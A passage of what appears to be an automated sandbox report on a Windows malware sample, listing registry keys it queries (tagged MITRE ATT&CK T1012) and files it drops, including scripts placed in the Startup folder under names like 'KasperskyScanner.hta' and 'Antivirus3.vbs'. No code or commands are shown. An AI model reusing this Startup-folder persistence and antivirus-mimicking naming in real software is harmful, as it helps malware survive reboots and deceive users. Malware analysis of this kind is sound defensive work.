\"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\INPROCSERVER32\"; Key: \"LOADWITHOUTCOM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\EUPP PROTECTED - IT IS A VIOLATION OF WINDOWS POLICY TO MODIFY. SEE AKA.MS/BROWSERPOLICY\"; Key: \"FIRSTRUNCOMPLETE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"CREATEURICACHESIZE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"ENABLEPUNYCODE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005808]\n \"Antivirus.bat.bin\" has type \"DOS batch file ASCII text with very long lines (844) with CRLF line terminators\"- [targetUID: N/A]\n \"YourMom.vbs\" has type \"ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005808]\n \"Antivirus3.vbs\" has type \"C source ASCII text\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005808]\n \"KasperskyScanner.hta\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005808]\n \"Antivirus2.vbs\" has type \"ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005808]\n \"YourMomIsGay.html\" has type \"HTML document ISO-8859 text with CRLF line terminators\"- Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005808]\n \"3776.txt\" has type \"ASCII text with very long lines (481) with CRLF line terminators\"- [targetUID: N/A]\n \"21543.txt\" has type \"ASCII text with very long lines (480) with CRLF line terminators\"- [targetUID: N/A]\n \"15291.txt\" has type \"ASCII text with very long lines (480) with CRLF line terminators\"- [targetUID: N/A]\n \"9553.txt\" has type \"ASCII text with very long lines (479) with CRLF line terminators\"- [targetUID: N/A]\n \"23484.txt\" has type \"ASCII text with very long lines (478) with CRLF line terminators\"- [targetUID: N/A]\n \"21796.txt\" has type \"ASCII text with very long lines (478) with CRLF line terminators\"- [targetUID: N/A]\n \"678.txt\" has type \"ASCII text with very long lines (477) with CRLF line terminators\"- [targetUID: N/A]\n \"7535.txt\" has type \"ASCII text with very long lines (476) with CRLF line terminators\"- [targetUID: N/A]\n \"26413.txt\" has type \"ASCII text with very long lines (476) with CRLF line terminators\"- [targetUID: N/A]\n \"31489.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"24799.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"1767.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"21851.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"10307.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"22220.txt\" has type \"ASCII text with very long lines (475) with CRLF line terminators\"- [targetUID: N/A]\n \"26709.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"22491.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"18237.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"27235.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"5153.txt\" has type \"ASCII text with very long lines (474) with CRLF line terminators\"- [targetUID: N/A]\n \"14681.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"18303.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"29752.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"2438.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"31163.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"645.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"21544.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"12564.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"20306.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"2497.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"12733.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"30206.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"28019.txt\" has type \"ASCII text with very long lines (473) with CRLF line terminators\"- [targetUID: N/A]\n \"25162.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"18190.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"30947.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"12273.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"9364.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"29663.txt\" has type \"ASCII text with very long lines (472) with CRLF line terminators\"- [targetUID: N/A]\n \"25006.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"26496.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"10575.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"13494.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"8169.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"3700.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"13272.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"32680.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"30763.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"8471.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"25769.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"28615.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"25161.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"15521.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"15514.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"1785.txt\" has type \"ASCII text with very long lines (471) with CRLF line terminators\"- [targetUID: N/A]\n \"24401.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"5805.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"29775.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"18674.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"11340.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"4241.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"10412.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"9694.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"31438.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"21096.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"23015.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"12740.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"28275.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"30789.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"21878.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"24734.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"12894.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"13944.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"60.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"31070.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"24120.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"25314.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"15101.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"27201.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"24940.txt\" has type \"ASCII text with very long lines (470) with CRLF line terminators\"- [targetUID: N/A]\n \"16032.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"26494.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"27393.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"21985.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"9629.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"17157.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"30444.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"26344.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"14341.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"4866.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"23597.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"13305.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"2855.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"16478.txt\" has type \"ASCII text with very long lines (469) with CRLF line terminators\"- [targetUID: N/A]\n \"609.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"17950.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"28385.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"21070.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"30564.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"23940.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"1490.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"29539.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"26135.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"16969.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"8343.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"18883.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"23297.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"16541.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"15825.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"22789.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"7271.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"21621.txt\" has type \"ASCII text with very long lines (468) with CRLF line terminators\"- [targetUID: N/A]\n \"31271.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"11200.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"5885.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"25909.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"3362.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"12508.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"5352.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"26289.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"20190.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"32647.txt\" has type \"ASCII text with very long lines (467) with CRLF line terminators\"- [targetUID: N/A]\n \"8092.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"27892.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"19443.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"19729.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"8428.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"11241.txt\" has type \"ASCII text with very long lines (466) with CRLF line terminators\"- [targetUID: N/A]\n \"2421.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"3596.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"27573.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"20721.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"30167.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"1964.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"15000.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"15629.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"8102.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"6444.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"9660.txt\" has type \"ASCII text with very long lines (465) with CRLF line terminators\"- [targetUID: N/A]\n \"29600.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"28789.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"9922.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"2113.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"8705.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"9523.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"32661.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"27332.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"26223.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"21623.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"23314.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"27711.txt\" has type \"ASCII text with very long lines (464) with CRLF line terminators\"- [targetUID: N/A]\n \"13967.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"8265.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"2547.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"14426.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"16543.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"26456.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"19390.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"28325.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"25149.txt\" has type \"ASCII text with very long lines (463) with CRLF line terminators\"- [targetUID: N/A]\n \"26586.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"8242.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"31300.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"16462.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"29899.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"9739.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"808.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"4727.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"19458.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"29410.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"7148.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"6058.txt\" has type \"ASCII text with very long lines (462) with CRLF line terminators\"- [targetUID: N/A]\n \"31216.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"29039.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"1304.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"24358.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"4104.txt\" has type \"ASCII text with very long lines (461) with CRLF line terminators\"- [targetUID: N/A]\n \"20295.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"228.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"624.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"19210.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"25475.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"16876.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"322.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"25523.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"22607.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"22035.txt\" has type \"ASCII text with very long lines (460) with CRLF line terminators\"- [targetUID: N/A]\n \"4525.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"5624.txt\" has type \"ASCII text with very long lines (459) with CRLF line terminators\"- [targetUID: N/A]\n \"29704.txt\" has type \"ASCII text with very long lines (458) with CRLF line terminators\"- [targetUID: N/A]\n \"22998.txt\" has type \"ASCII text with very long lines (457) with CRLF line 